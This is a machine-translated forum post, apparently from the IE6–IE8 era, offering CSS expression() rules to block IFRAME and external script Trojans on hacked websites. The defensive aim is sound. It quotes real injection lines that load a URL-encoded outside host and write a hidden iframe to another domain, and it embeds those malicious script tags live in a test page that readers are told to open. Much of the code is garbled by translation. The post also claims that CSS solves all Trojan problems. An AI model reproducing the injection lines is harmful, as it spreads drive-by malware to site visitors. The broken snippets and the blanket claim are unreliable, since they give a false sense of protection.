Line 1 and line 2 code solve all webpage Trojans

The following code is used to solve the problem:

I believe that most of my friends are victims of IFRAME Trojans, and some of my friends have been injected into IFRAME. Moreover, it is easy to inject IFRAME into ARP attacks, and only the LAN is always under threat. It is close to the New Year's standard. To prevent more friends from being attacked, I will explain it in detail.

Linger once posted a post on the classic Forum: a line of code solves the IFRAME Trojan defense solution for websites. Many friends have contacted linger, and some of them are grateful, but there are more questions. Let's take a closer look at the principles today:

IE only -- Generally, only IE is afraid of trojans such as IFRAME, so linger will take ie for the first time.

Before reading this article, let's take a look at expression;

Ie5 and later versions support the use of expression in CSS to associate CSS attributes with JavaScript scripts. the CSS attributes here can be element-Solid
Some attributes can also be custom attributes. That is to say, the CSS attribute can be followed by a javascript expression, and the value of the CSS attribute is equal to the result of JavaScript expression execution.
You can directly reference attributes and methods of an element in an expression, or use other browser objects. This expression is like a member function in this element.

Many of my friends know that CSS can directly describe the appearance of a visual tag. For example, P {color: Red} indicates that the text color in all P marks on the webpage will change to Red. Isn't IFRAME a mark? Start to write code with linger:
IFRAME {... write the CSS code describing the appearance here ;};

Think about the best way to prevent the stuff in IFRAME from being downloaded? The core is to cut off the requests in the IFRAME, and cut off the request to quickly destroy the IFRAME object. How to implement it? Didn't expression be introduced above? Expression can execute JS scripts. The syntax format is as follows:

Mark the inherent CSS attribute name: expression (JS expression );
Or custom attribute name: expression (JS expression );

Here we choose the second type. The Code should be like this IFRAME {v: expression (JS expression );}

The next question is how to destroy all IFRAME objects on the webpage. The principle of using JS is as follows: Change the request address in IFRAME to a blank page.
(About: blank), and then remove the IFRAME object from the DOM (Document Object Model) to cut off all requests in the IFRAME. There are many ways to remove DOM nodes,
I will use the outerhtml attribute here. The CSS code is as follows:

IFRAME {v: expression (this. src = 'about: blank ', this. outerhtml = '');}

Note: The preceding vword is a CSS attribute defined by linger. This indicates all IFRAME objects that will describe the appearance. The comma in the middle indicates that the two sentences are executed together, and no
Execution priority, which is a powerful guarantee. About: blank represents a blank page, which everyone knows. The outerhtml attribute indicates that a DOM object contains its own HTML code, while
Innerhtml is the HTML code contained in the DOM object (excluding itself.

If the code is ready, let me believe it to test whether it works.

First, create a new webpage and insert the above CSS code (or add the above sentence to your existing CSS code ):

<Style type = "text/CSS">
IFRAME {v: expression (this. src = 'about: blank ', this. outerhtml = '');}
</Style>

Then insert several IFRAME codes on this page, assuming they are Trojans. The Code is as follows:

<IFRAME src = "http://www.baidu.com"> </iframe> Baidu
<IFRAME src = "http://www.126.com/"> </iframe> 126 mailbox
<IFRAME src = "http://www.163.com"> </iframe> Netease

Save it as noiframe.htm and open the browser to test it. (You need to enable the prompt bar of the script that is disabled at the top of the local test ). I use the packet capture tool here for testing, but there is no need to make
With the packet capture tool, the simplest and most effective method is to open the cache folder of IE, first clear it, And then refresh the page to see if there are any files in these three websites in the cache folder. If no, it indicates no
What is the request result returned? The test result is satisfactory. I have a smile on my face ^ *. At this time, my colleague handed me a piece of cake, which is delicious.

Tip: Windows XP SP2 cache folder Location C:/Documents and Settings/Administrator/Local Settings/Temporary Internet Files

Careful friends found the problem. What should I do if I want to use IFRAME on my webpage?

A: If you want to display your IFRAME on a webpage, and other IFRAME trojans do not work, add a # f126 {v: expression () in CSS ()! Important}
The corresponding IFRAME code is:

<IFRAME id = "f126" name = "f126" src = "http://www.126.com/"> </iframe>

OK.

Tip: "!" is displayed in IE7 first. The style described by important, which IE6 does not know! Important adopts the proximity principle, so the code of IE6 can be placed at the end of CSS.

Many of my friends have questions about f126. They asked me why I got "f126" and I answered this question-This f126 is random, as long as the ID attribute in the IFRAME below is consistent with that in CSS. My colleague asked me to deliver another piece of cake. I said I was full ..

Of course, the Trojan can construct such code:

<IFRAME Style = "V: expression ()! Important "src =" url "> </iframe>

It invalidates my defense method, but it has to look at the prefix V in IFRAME in my CSS code. If my V is changed, haha, doesn't it work!

Summary:
The above method only stops the IFRAME request and destroys the IFRAME itself, but the method of Trojan mounting in the future has changed, for example
This method cannot be used when the <SCRIPT> </SCRIPT> method fails. This method is not the final solution, and the final solution is to find the truth.
Cause of being mounted to IFRAME, blocking the source. This is not my business, huh ~

Application Example: http://www.cncert.net with this code MD5 (hash) Verification, very perfect anti-Trojan solution;

Classic Forum Communication:
Http://bbs.blueidea.com/thread-2818052-1-1.html

 

 

The following code is used to solve the problem:

It's still a matter of hanging horses. During this period of time, I gradually felt a lot of pressure. I 've been adding more and more people via QQ or MSN, and my work has been very busy recently. Ah, think about it. You still have to take the time to help you.

Not long ago, http://bbs.blueidea.com/thread-2818052-1-1.html1
Line-of-code solutions for IFRAME Trojans (including server injection, client ARP injection, etc.) have been recognized by many friends, which is indeed a good way to avoid the storm. But now, the method of network horse mounting is exactly like what I do
Unexpectedly changed. Now I am popular with <SCRIPT> Trojan Horse and sweat. I have watched the websites of several netizens. -- added the following to the top or bottom of the page:

Note: The following addresses contain Trojans, so do not access them easily:

<SCRIPT src = http: // % 76% 63% 63% 64% 2e % 63% 6e> </SCRIPT>
<SCRIPT src = http: // % 76% 63% 63% 64% 2e % 63% 6e> </SCRIPT>
<SCRIPT src = http: // % 76% 63% 63% 64% 2e % 63% 6e> </SCRIPT>
<SCRIPT src = http: // % 76% 63% 63% 64% 2e % 63% 6e> </SCRIPT>
<SCRIPT src = http: // % 76% 63% 63% 64% 2e % 63% 6e> </SCRIPT>
<SCRIPT src = http: // % 76% 63% 63% 64% 2e % 63% 6e> </SCRIPT>
<SCRIPT src = http: // % 76% 63% 63% 64% 2e % 63% 6e> </SCRIPT>
<SCRIPT src = http: // % 76% 63% 63% 64% 2e % 63% 6e> </SCRIPT>

Sweating, inserting n identical <SCRIPT> tags in a row. Even if any patch is installed on the computer, visit the http: // % 76% 63% 63% 64% 63% 2e % 6e (or directly use thunder to download the patch ~ Now:

Document. Write ("<Div style = 'display: none'> ")
Document. Write ("<IFRAME src = http://a.158dm.com/b1.htm? Id = 017 width = 0 Height = 0> </iframe> ")
Document. Write ("</div> ")

Download ghost again with thunder. The charge is quite high!

...
VaR kfqq, qqs = "[color = Magenta] 784378237 [/color]"; qwfgsg = "llll // xxxxxld"; kfqq = qqs;
(... Omitted) (there are n statistics of JS Code below)

I can't ignore the above situation. Think of a solution, bro. I drank a bowl of green bean porridge, put a lot of sugar, good to drink. Thought of the solution. The answer is obtained through a slight analysis. Let's take a look at the features of <SCRIPT> Trojans:

<SCRIPT src = http: // % 76% 63% 63% 64% 2e % 63% 6e> </SCRIPT>

By the way, the SRC of the script Trojan is generally from an external domain, that is, the SRC is headers with HTTP. If it is a script of your website, HTTP is not required. Then, let's look at the original form of the Trojan, it also outputs IFRAME, JS Code, or other <Object> code, no matter how many, how much to kill.

Let's write CSS with me and solve them one by one. I wrote five different solutions. Let's test them:

Solution 1:

IFRAME {n1ifm: expression (this. src = 'about: blank ', this. outerhtml = '');}/* this line of code solves the problem of hanging IFRAME Trojans */
Script {nojs1: expression (this. SRC. tolowercase (). indexof ('http') = 0 )? Document. Write ('Trojan is isolated successfully! '):'');}

Principle: Convert the <SCRIPT>-marked SRC file to lowercase, and check whether it is an external domain JS script file starting with "HTTP". If yes, the page content is cleared and the "Trojan is isolated successfully!" is written! ". Otherwise, it is displayed normally.

Disadvantage: the visitor cannot see the page infected with the <SCRIPT> Trojan.

Solution 2:

IFRAME {nifm2: expression (this. src = 'about: blank ', this. outerhtml = '');}
Script {no2js: expression (this. SRC. tolowercase (). indexof ('http') = 0 )? Document. Close ():'');}

Principle: Force disable document. Write () of JS files in external domains using document. Close. The trojan content has not been written yet. Only some of the content has been forcibly cached and output, and the rest will not be written.

 

Solution 3:

IFRAME {ni3fm: expression (this. src = 'about: blank ', this. outerhtml = '');}
Script {n3ojs: expression (this. SRC. tolowercase (). indexof ('http') = 0 )? Document.exe ccommand ('stop '):'');}

Principle: The same as the JS file to the external domain, immediately call the IE private Execcommand method to stop all requests on the page, so the subsequent external domain JS file is also forced to stop downloading. Just Like clicking the "stop" button in the browser. It seems that this is a method for js to simulate the ie stop button.

Solution 4:

IFRAME {nif4m: expression (this. src = 'about: blank ', this. outerhtml = '');}
Script {noj4s: expression (if (this. SRC. indexof ('HTTP ') = 0) This. src = 'res: // ieframe. dll/dnserror.htm ');}

Principle: overwrite the SRC of the JS file in the external domain to the address of the ie404 error page. In this way, the JS Code in the external domain will not be downloaded.

Solution5:

IFRAME {nifm5: expression (this. src = 'about: blank ', this. outerhtml = '');}
Script {noj5s: expression (this. Id. tolowercase (). indexof ('vok ')! =-1 )? Document. Write ('Trojan is isolated successfully! '):''));}

In the fifth solution, you must add an ID prefixed with "LH" to the page HTML source code <SCRIPT>, such as lhweatherjsapi and <SCRIPT src = "***/**. JS "id =" lhsearchjsapi "> </SCRIPT>

The Code on the following page contains a trojan address, which has been repeated for six times on the page. You can test it using different methods above to see how I study it! (This test is dangerous. Make sure all patches are installed before testing)

<! Doctype HTML public "-// W3C // dtd xhtml 1.0 transitional // en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<HTML xmlns = "http://www.w3.org/1999/xhtml">
<Head>
<Meta http-equiv = "Content-Type" content = "text/html; charset = UTF-8"/>
<Title> CSS code that allows the JS Trojan process to stop quickly </title>
<Style type = "text/CSS" id = "linrstudio">
/* <! [CDATA [*/
IFRAME {nhk1: expression (this. src = 'about: blank ', this. outerhtml = '');}
Script {ngz1: expression (this. SRC. indexof ('http') = 0 )? Document. Close ():'');}
/* Later please pay attention to the latest Trojan processing method: http://www.nihaoku.cn/ff/api.htm */
/*]> */
</Style>
</Head>
<Body>
<SCRIPT type = "text/JavaScript" src = "1.js"> </SCRIPT>
<SCRIPT src = http: // % 76% 63% 63% 64% 2e % 63% 6e> </SCRIPT>
<SCRIPT src = "http: // % 76% 63% 63% 64% 2e % 63% 6e" type = "text/JavaScript"> </SCRIPT>
<SCRIPT src = http: // % 76% 63% 63% 64% 2e % 63% 6e> </SCRIPT>
I am page 1
<SCRIPT src = http: // % 76% 63% 63% 64% 2e % 63% 6e> </SCRIPT>
I'm from page 2
<SCRIPT src = http: // % 76% 63% 63% 64% 2e % 63% 6e> </SCRIPT>
I am 3 of the page itself
<SCRIPT src = http: // % 76% 63% 63% 64% 2e % 63% 6e> </SCRIPT>
</Body>
</Html>

Among them, 1. JS is on its own site:

Document. Write ("I Am a JS file on this site ");
Document. Write (" ");

My test environment is:

Windows XP SP2 and Windows Vista SP1
IE6/IE7/IE8
All Patches have been installed.

In summary, all the current Trojan-mounting methods have been cracked, and CSS can be used to solve all the trojan problems, so that visitors will not be easily poisoned.

You should also take a closer look at the bugs in my code. If you have any bugs, you must discuss them to solve the problem! Or you may have another better way to discuss it.

Classic Forum Communication:
Http://bbs.blueidea.com/thread-2841460-1-1.html